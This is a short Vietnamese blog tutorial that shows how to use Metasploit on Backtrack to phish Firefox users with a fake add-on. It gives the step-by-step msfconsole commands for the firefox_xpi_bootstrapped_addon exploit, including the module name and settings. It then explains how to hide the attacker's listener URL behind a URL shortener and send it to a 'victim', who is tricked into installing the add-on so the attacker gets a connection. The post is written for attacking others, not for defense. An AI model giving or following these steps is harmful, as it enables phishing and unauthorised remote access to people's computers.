Chủ Nhật, 27 tháng 1, 2013

Phishing addon firefox bằng Backtrack

Kĩ thuật này dùng để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox.Đầu tiên mở terminal của Backtrack lên
type: msfupdate nếu chưa update exploit
type: msfconsole


tiếp tục 
type : use exploit/multi/browser/firefox_xpi_bootstrapped_addon
để dùng exploit này
đặt tên cho addon ta addname như sau:
type: set addonname quangcaoblock
Set URIPATH hay LHOST tùy bạn.Mình set như sau
type:set URIPATH /



 sau khi set xong thì type:exploit rồi ngồi chờ.kết quả ta nhận đc như sau


ở đây ta nhận đc IP để connect về là http://192.168.74.128:8080/
nếu để như vậy nó khá lộ,ta chuyển nó thành link khác nhờ dịch vụ short link chẳng hạn
vào http://goo.gl/ post cái url trên vào nhận đc url mới là http://goo.gl/tzjuh
Gửi cho victim thôi.
Khi victim kích vào thì nó yêu cầu cài addon cho firefox mới xem đc trang gì gì đó.

Nếu victim kích Alow thì xem như dính chưởng.trên Backtrack ta nhận đc thông báo connect thành công như sau

 Kiểm tra nhé


oke end tut.tut by capuchino vhb (từ sp icarus ^^).

http://www.mediafire.com/?uwwh1cv2so83v26

1 nhận xét: